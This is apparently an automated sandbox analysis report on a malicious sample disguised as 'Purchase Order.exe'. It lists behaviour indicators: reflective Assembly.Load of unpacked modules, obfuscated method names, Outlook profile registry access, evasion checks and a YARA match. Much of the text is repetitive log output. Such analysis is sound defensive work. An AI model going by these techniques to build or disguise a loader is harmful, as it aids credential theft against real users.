            Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: EeBu.pdbSHA256 source: Purchase Order.exe
            Source: Binary string: EeBu.pdb source: Purchase Order.exe

            Data Obfuscation

            barindex
            Source: Purchase Order.exe, FormMainMenu.cs.Net Code: InitializeComponent
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, adcXZhbMFM4fJQUs1b.cs.Net Code: UwvUwCha1w System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, adcXZhbMFM4fJQUs1b.cs.Net Code: UwvUwCha1w System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Purchase Order.exe.50c0000.10.raw.unpack, nL.cs.Net Code: sf
            Source: 0.2.Purchase Order.exe.50c0000.10.raw.unpack, nL.cs.Net Code: wb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Purchase Order.exe.272447c.1.raw.unpack, nL.cs.Net Code: sf
            Source: 0.2.Purchase Order.exe.272447c.1.raw.unpack, nL.cs.Net Code: wb System.Reflection.Assembly.Load(byte[])
            Source: Purchase Order.exeStatic PE information: 0xD78ABBA7 [Fri Aug 4 02:10:47 2084 UTC]
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC97E9 push ss; retf 4_2_06CC97EA
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC97F8 push ss; retf 4_2_06CC9896
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC8C51 push cs; retf 4_2_06CC8C52
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC9A4B push ss; retf 4_2_06CC9A4E
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CCF0B3 push es; ret 4_2_06CCF0B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_06CC9999 push ss; retf 4_2_06CC999A
            Source: Purchase Order.exeStatic PE information: section name: .text entropy: 7.904697572590049
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, IaqcXs97WBXJngyOcVe.csHigh entropy of concatenated method names: 'zqUrnBUUwQ', 'c71rts6khn', 'Rl1rwjqkdH', 'g1Kr8l0hJy', 'YENrL4bkQr', 'gTjrfyeEGm', 'vlSrAreUqw', 'TKkrMB3ZA9', 'QHArSv78te', 'o6JrV7vJBi'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, ov3QI7o2LQiP9hm7vr.csHigh entropy of concatenated method names: 'DB8TBu7QVY', 'qYKTssZqPU', 'Wvw37J4cF0', 'vHK39XMx9m', 'gfeTN67Vra', 'cd4Ty8tO7m', 'x6UTW71aNS', 'bovTi7kfD9', 'sqsT1IuYhl', 'adeThc7uTr'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, Y4XXcdBh2D3Y2wV0x9.csHigh entropy of concatenated method names: 'FcP3qN5qNI', 'tob35L1yJK', 'XOv3EXgV7e', 'VmX3DHB5Xn', 'mnU3lVILcU', 'hZT3213GIu', 'ViB3bSfVLe', 'xIP3PJXA73', 'rSl3IoDgaK', 'wEQ36p0DhA'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, ywuF0BhOIyhbeWVMWg.csHigh entropy of concatenated method names: 'ToString', 'PxPvNeIakL', 'di1vYXwe9E', 'fuVvXfgBHr', 'GDkvjL3DyL', 'kNVvmrlcR1', 'LstvZEIThp', 'qPIvK9Zu6v', 'qgovp0MT98', 'RjFvdCQVBw'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, KeBha09ksgHQPmF1Kkl.csHigh entropy of concatenated method names: 'v4tFnRBgNj', 'Y0oFtLHmhs', 'XrrFwZnqlM', 'NSN0WhtWHn31qfanBre', 'scom7ltCgRTvQT19IkL', 'wuMVDotbw5CpJUKOKEG', 'pKQc2UtcJYXTBZZTYpr'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, I5pNCkiWrBKvjFFeIg.csHigh entropy of concatenated method names: 'bBZgG5oCOL', 'wdFgyRWuEd', 'qPjgi4Vl6A', 'UICg1bWIlo', 'yUNgY5i5E3', 'zZIgXaVPoe', 'AnIgjPpsMw', 'z1qgmsgrW0', 'ghcgZWYKs9', 'nASgK1nWjy'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, yvFojtKGVoQZfW7OCQ.csHigh entropy of concatenated method names: 'NDl2qJYvaW', 'E7p2EMHpSG', 'rEZ2lPSkVP', 'WRRls1qJs6', 'bcWlzqxoxg', 'S7527QPEvF', 'Ig729ycXku', 'Sb42kVWksg', 'TqU2QVslFC', 'SZT2Ut2cLm'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, dwatSuHMe1qQvliJey.csHigh entropy of concatenated method names: 'o6qlJCYC05', 'J3ml5Fs92h', 'VTXlDkJeAT', 'UECl2SYdS3', 'ltalbQ6Jcj', 'FtqDCWTmTn', 'eOiDoN1R2j', 'IPNDuppopc', 'pBWDBrsfa0', 'iRaDOhY5Rn'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, VolHSssxIRWE0AycLQ.csHigh entropy of concatenated method names: 'RJ5r9IC07i', 'b7ZrQqdTt9', 'C6trUSsnFJ', 'nfIrq4XwJq', 'hbZr5s0PsC', 'OyRrDNQDZG', 'WUhrlNYeU2', 'Nyy3u9JwhX', 'dMv3BCgvlo', 'IUh3O9Ra48'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, YwUR0vWdBmCNu00DFo.csHigh entropy of concatenated method names: 'beV4MAgDPu', 'OyA4S0KfpZ', 'zRI4Hocl7M', 'NZH4YbcQgw', 'T2W4jqQfdw', 'XSw4m9qabx', 'eaN4KdrMo1', 'VM04pReKCq', 'qSF4GJGHR0', 'BpS4NElP8p'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, aOOOxadFB9Bng1Fk99.csHigh entropy of concatenated method names: 'xP72nkJCYZ', 'kuH2tYiVjD', 'Aac2war4CM', 'yan28KtEqd', 'vE52LFsWid', 'QZk2fgFGtx', 'pI62A6WFTo', 'uoK2MijTYX', 'Brm2S5VSbP', 'V6m2VXkeNQ'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, XxFjHXMucdrtqTOWBP.csHigh entropy of concatenated method names: 'r6V5i8uMtC', 'FNU51Gf7Qc', 'Hyt5hs8p2m', 'zVx5e4byt7', 'OA15Cqs50d', 'o385o61ALa', 'GKL5uqdONB', 'nWw5BSI9vL', 't1u5OkNGOM', 'TOi5sfCh2x'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, sMWB1oOcSfDcEGsrEo.csHigh entropy of concatenated method names: 'RaL3HypbgQ', 'l5P3YQiR9Z', 'cWb3XSYgle', 'm5m3jZCHEL', 'YOk3irS244', 'pB13mw13Cx', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, XtyULeSecluK2WEKkB.csHigh entropy of concatenated method names: 'F4OE8shA3S', 'JYsEfw9fsy', 'wnDEMBME2M', 'MOcESJSlHK', 'KobEgBePNa', 'VK3EvMqSM5', 'PV4ET5ubXT', 'IgHE3PkTkI', 'CSLErGMV6U', 'APOEFYlhEk'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, FOrW3W5UUNYhKWNjPf.csHigh entropy of concatenated method names: 'Dispose', 'SoG9OgMiJh', 'E2fkY0Au3I', 'aLeUURJX9e', 'xs49sXXcdh', 'jD39zY2wV0', 'ProcessDialogKey', 'v9Fk7MWB1o', 'uSfk9DcEGs', 'rEokkoolHS'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, u1ytKukRLLd4g2nvo4.csHigh entropy of concatenated method names: 'nBpwbIIod', 'oHr8ZbU5Y', 'DLqfbmTY2', 'd7CATYFVY', 'XFUSaquiO', 'oO1V4CNPW', 'e0g8jGTqydhN100I9S', 'EVXN6ud1Gs7T9aoLMw', 'UHP3ISZfR', 'MMHFf6CEZ'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, BihELb9QnKSKCOgd75n.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VyqFipqdSc', 'AgNF14XJs5', 'wh1FhuE0IP', 'BbZFeFOqOk', 'frsFCf3tPj', 'TPfFofFtpH', 'WbQFuNhQoX'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, adcXZhbMFM4fJQUs1b.csHigh entropy of concatenated method names: 'y6mQJDmITU', 'uHCQq6qZUY', 'f82Q5EMCwH', 'HFpQEq96TP', 'FoNQD8WPLN', 'IfRQlbImO6', 'LZEQ2pyCiG', 'q3AQba9E66', 'EN1QPk5ZVd', 'pBbQIehPAq'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, sbL4qKV2G32ksHUvGX.csHigh entropy of concatenated method names: 'RixDLGKKZw', 'o00DAb2kVT', 'oJtEXJGXo8', 'BhREjmV1c8', 'yf7EmjWpH1', 'S9MEZgvtOc', 'qO1EKXCHhG', 'DnAEpm48jH', 'tLaEdlF00Q', 'qsiEGwFXnq'
            Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, Vs3SJqUNwpqIpO9ISn.csHigh entropy of concatenated method names: 'ARB92xFjHX', 'Wcd9brtqTO', 'Tec9IluK2W', 'gKk96BFbL4', 'GUv9gGXQwa', 'zSu9vMe1qQ', 'Ov7D2El9bDMG2mVM1h', 'mCBmNTncR8cdd9efA9', 'S5w99BZoaR', 'o2a9QGtnEr'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, IaqcXs97WBXJngyOcVe.csHigh entropy of concatenated method names: 'zqUrnBUUwQ', 'c71rts6khn', 'Rl1rwjqkdH', 'g1Kr8l0hJy', 'YENrL4bkQr', 'gTjrfyeEGm', 'vlSrAreUqw', 'TKkrMB3ZA9', 'QHArSv78te', 'o6JrV7vJBi'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, ov3QI7o2LQiP9hm7vr.csHigh entropy of concatenated method names: 'DB8TBu7QVY', 'qYKTssZqPU', 'Wvw37J4cF0', 'vHK39XMx9m', 'gfeTN67Vra', 'cd4Ty8tO7m', 'x6UTW71aNS', 'bovTi7kfD9', 'sqsT1IuYhl', 'adeThc7uTr'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, Y4XXcdBh2D3Y2wV0x9.csHigh entropy of concatenated method names: 'FcP3qN5qNI', 'tob35L1yJK', 'XOv3EXgV7e', 'VmX3DHB5Xn', 'mnU3lVILcU', 'hZT3213GIu', 'ViB3bSfVLe', 'xIP3PJXA73', 'rSl3IoDgaK', 'wEQ36p0DhA'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, ywuF0BhOIyhbeWVMWg.csHigh entropy of concatenated method names: 'ToString', 'PxPvNeIakL', 'di1vYXwe9E', 'fuVvXfgBHr', 'GDkvjL3DyL', 'kNVvmrlcR1', 'LstvZEIThp', 'qPIvK9Zu6v', 'qgovp0MT98', 'RjFvdCQVBw'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, KeBha09ksgHQPmF1Kkl.csHigh entropy of concatenated method names: 'v4tFnRBgNj', 'Y0oFtLHmhs', 'XrrFwZnqlM', 'NSN0WhtWHn31qfanBre', 'scom7ltCgRTvQT19IkL', 'wuMVDotbw5CpJUKOKEG', 'pKQc2UtcJYXTBZZTYpr'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, I5pNCkiWrBKvjFFeIg.csHigh entropy of concatenated method names: 'bBZgG5oCOL', 'wdFgyRWuEd', 'qPjgi4Vl6A', 'UICg1bWIlo', 'yUNgY5i5E3', 'zZIgXaVPoe', 'AnIgjPpsMw', 'z1qgmsgrW0', 'ghcgZWYKs9', 'nASgK1nWjy'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, yvFojtKGVoQZfW7OCQ.csHigh entropy of concatenated method names: 'NDl2qJYvaW', 'E7p2EMHpSG', 'rEZ2lPSkVP', 'WRRls1qJs6', 'bcWlzqxoxg', 'S7527QPEvF', 'Ig729ycXku', 'Sb42kVWksg', 'TqU2QVslFC', 'SZT2Ut2cLm'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, dwatSuHMe1qQvliJey.csHigh entropy of concatenated method names: 'o6qlJCYC05', 'J3ml5Fs92h', 'VTXlDkJeAT', 'UECl2SYdS3', 'ltalbQ6Jcj', 'FtqDCWTmTn', 'eOiDoN1R2j', 'IPNDuppopc', 'pBWDBrsfa0', 'iRaDOhY5Rn'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, VolHSssxIRWE0AycLQ.csHigh entropy of concatenated method names: 'RJ5r9IC07i', 'b7ZrQqdTt9', 'C6trUSsnFJ', 'nfIrq4XwJq', 'hbZr5s0PsC', 'OyRrDNQDZG', 'WUhrlNYeU2', 'Nyy3u9JwhX', 'dMv3BCgvlo', 'IUh3O9Ra48'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, YwUR0vWdBmCNu00DFo.csHigh entropy of concatenated method names: 'beV4MAgDPu', 'OyA4S0KfpZ', 'zRI4Hocl7M', 'NZH4YbcQgw', 'T2W4jqQfdw', 'XSw4m9qabx', 'eaN4KdrMo1', 'VM04pReKCq', 'qSF4GJGHR0', 'BpS4NElP8p'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, aOOOxadFB9Bng1Fk99.csHigh entropy of concatenated method names: 'xP72nkJCYZ', 'kuH2tYiVjD', 'Aac2war4CM', 'yan28KtEqd', 'vE52LFsWid', 'QZk2fgFGtx', 'pI62A6WFTo', 'uoK2MijTYX', 'Brm2S5VSbP', 'V6m2VXkeNQ'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, XxFjHXMucdrtqTOWBP.csHigh entropy of concatenated method names: 'r6V5i8uMtC', 'FNU51Gf7Qc', 'Hyt5hs8p2m', 'zVx5e4byt7', 'OA15Cqs50d', 'o385o61ALa', 'GKL5uqdONB', 'nWw5BSI9vL', 't1u5OkNGOM', 'TOi5sfCh2x'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, sMWB1oOcSfDcEGsrEo.csHigh entropy of concatenated method names: 'RaL3HypbgQ', 'l5P3YQiR9Z', 'cWb3XSYgle', 'm5m3jZCHEL', 'YOk3irS244', 'pB13mw13Cx', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, XtyULeSecluK2WEKkB.csHigh entropy of concatenated method names: 'F4OE8shA3S', 'JYsEfw9fsy', 'wnDEMBME2M', 'MOcESJSlHK', 'KobEgBePNa', 'VK3EvMqSM5', 'PV4ET5ubXT', 'IgHE3PkTkI', 'CSLErGMV6U', 'APOEFYlhEk'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, FOrW3W5UUNYhKWNjPf.csHigh entropy of concatenated method names: 'Dispose', 'SoG9OgMiJh', 'E2fkY0Au3I', 'aLeUURJX9e', 'xs49sXXcdh', 'jD39zY2wV0', 'ProcessDialogKey', 'v9Fk7MWB1o', 'uSfk9DcEGs', 'rEokkoolHS'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, u1ytKukRLLd4g2nvo4.csHigh entropy of concatenated method names: 'nBpwbIIod', 'oHr8ZbU5Y', 'DLqfbmTY2', 'd7CATYFVY', 'XFUSaquiO', 'oO1V4CNPW', 'e0g8jGTqydhN100I9S', 'EVXN6ud1Gs7T9aoLMw', 'UHP3ISZfR', 'MMHFf6CEZ'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, BihELb9QnKSKCOgd75n.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VyqFipqdSc', 'AgNF14XJs5', 'wh1FhuE0IP', 'BbZFeFOqOk', 'frsFCf3tPj', 'TPfFofFtpH', 'WbQFuNhQoX'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, adcXZhbMFM4fJQUs1b.csHigh entropy of concatenated method names: 'y6mQJDmITU', 'uHCQq6qZUY', 'f82Q5EMCwH', 'HFpQEq96TP', 'FoNQD8WPLN', 'IfRQlbImO6', 'LZEQ2pyCiG', 'q3AQba9E66', 'EN1QPk5ZVd', 'pBbQIehPAq'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, sbL4qKV2G32ksHUvGX.csHigh entropy of concatenated method names: 'RixDLGKKZw', 'o00DAb2kVT', 'oJtEXJGXo8', 'BhREjmV1c8', 'yf7EmjWpH1', 'S9MEZgvtOc', 'qO1EKXCHhG', 'DnAEpm48jH', 'tLaEdlF00Q', 'qsiEGwFXnq'
            Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, Vs3SJqUNwpqIpO9ISn.csHigh entropy of concatenated method names: 'ARB92xFjHX', 'Wcd9brtqTO', 'Tec9IluK2W', 'gKk96BFbL4', 'GUv9gGXQwa', 'zSu9vMe1qQ', 'Ov7D2El9bDMG2mVM1h', 'mCBmNTncR8cdd9efA9', 'S5w99BZoaR', 'o2a9QGtnEr'
            Source: C:\Users\user\Desktop\Purchase Order.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 5304, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 920000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 2700000 memory reserve | memory write watchJump to behavior
